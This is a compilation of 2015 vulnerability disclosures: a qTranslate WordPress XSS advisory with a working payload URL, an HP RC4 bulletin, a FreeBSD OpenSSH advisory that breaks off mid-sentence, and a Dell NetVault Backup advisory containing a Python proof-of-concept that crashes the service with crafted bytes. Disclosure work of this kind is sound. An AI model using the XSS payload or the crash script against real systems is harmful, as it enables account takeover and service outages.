Cross-Site Scripting (XSS) in qTranslate WordPress Plugin

Advisory ID: HTB23265
Product: qTranslate WordPress plugin
Vendor: Qian Qin
Vulnerable Version(s): 2.5.39  and probably prior
Tested Version: 2.5.39
Advisory Publication:  July 1, 2015  [without technical details]
Vendor Notification: July 1, 2015
Public Disclosure: July 29, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2015-5535
Risk Level: Medium
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Discovered and Provided: High-Tech Bridge Security Research Lab (https://www.htbridge.com/advisory/ )

------------------------------------------------------------
-----------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in qTranslate WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against website administrators. Successful exploitation of this vulnerability may allow a remote attacker to gain complete control over the web application, if the victim visits a malicious page with XSS exploit. This vulnerability can also be used to perform drive-by-download or phishing attacks against website administrators.

Input passed via "edit" HTTP GET parameter to "/wp-admin/options-general.php" is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

A simple exploit below will display a JS popup with "ImmuniWeb" word:

http://wordpress/wp-admin/options-general.php?page=qtranslate&edit=%22%3E%3Cscript%3Ealert%28%2FImmuniWeb%2F%29%3B%3C%2Fscript%3E

[security bulletin] HPSBGN03366 rev.1 - HP Business Process Insight with RC4 Stream Cipher, Remote Disclosure of Information

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04726896

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04726896
Version: 1

HPSBGN03366 rev.1 - HP Business Process Insight with RC4 Stream Cipher,
Remote Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2015-07-29
Last Updated: 2015-07-29

Potential Security Impact: Remote disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Business
Process Insight.

This is the RC4 vulnerability known as the Bar Mitzvah attack, which could be
exploited remotely to allow disclosure of information.

FreeBSD Security Advisory FreeBSD-SA-15:16.openssh [REVISED]

============================================================
=================
FreeBSD-SA-15:16.openssh                                    Security Advisory
                                                          The FreeBSD Project

Topic:          OpenSSH multiple vulnerabilities

Category:       contrib
Module:         openssh
Announced:      2015-07-28, revised on 2015-07-30
Affects:        All supported versions of FreeBSD.
Corrected:      2015-07-28 19:58:44 UTC (stable/10, 10.2-PRERELEASE)
                2015-07-28 19:58:44 UTC (stable/10, 10.2-BETA2-p2)
                2015-07-28 19:59:04 UTC (releng/10.2, 10.2-RC1-p1)
                2015-07-28 19:59:11 UTC (releng/10.1, 10.1-RELEASE-p16)
                2015-07-28 19:58:54 UTC (stable/9, 9.3-STABLE)
                2015-07-28 19:59:22 UTC (releng/9.3, 9.3-RELEASE-p21)
                2015-07-30 10:09:07 UTC (stable/8, 8.4-STABLE)
                2015-07-30 10:09:31 UTC (releng/8.4, 8.4-RELEASE-p36)
CVE Name:       CVE-2014-2653, CVE-2015-5600

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

0.   Revision history

v1.0  2015-02-25 Initial release.
v1.1  2015-07-30 Revised patch for FreeBSD 8.x to address regression when
   

Dell Netvault Backup Remote Denial of Service

Product: Dell Netvault Backup
Link: http://software.dell.com/products/netvault-backup/
Vendor: Dell
Vulnerable Version(s): 10.0.1.24 and probably prior
Tested Version: Version 10.0.1.24
Advisory Publication: July 30, 2015
Vendor Notification: January 9, 2015
Public Disclosure: July 30, 2015
Vulnerability Type: Remote Denial of service
CVE Reference: CVE-2015-5696
Risk Level: Medium
Discovered and Provided: Josep Pi Rodriguez https://es.linkedin.com/pub/josep-pi-rodriguez/60/229/b24

------------------------------------------------------------
------------
-----------------------

Advisory Details:

Doing reverse engineering of the protocol was found several ways to cause a crash in the nvpmgr.exe process.The entire application (all processes) will die and it won't be able to restart again by itself unless someone do it manually.

Proof of concept script:

#!/usr/bin/python
import socket as so
from struct import *

server = "192.168.140.130"
port = 20031
d = "\x18\x00\x00\x00"
d += "\x01"

#d += "\xCB\x22\x77\xC9" # Another crash example
d += "\x18\xE8\xBE\xC8" # Will cause the crash
d += "\x0B\x00\x00\x00" + "AAAA" + "B" * 6
d += "\x00" # null byte

##
# send it

s = so.socket(so.AF_INET, so.SOCK_STREAM)
s.connect((server, port))
s.send(d)
s.close()

------------------------------------------------------------------------
-----------------------

Solution:

Disclosure timeline:
2015-01-09 Vendor notified via email
2015-05-26 Vendor notifies that the issue is fixed in version 10.0.5.x
2015-07-30 Public disclosure.

The fix done by Dell was not checked by the researcher.

------------------------------------------------------------------------
-----------------------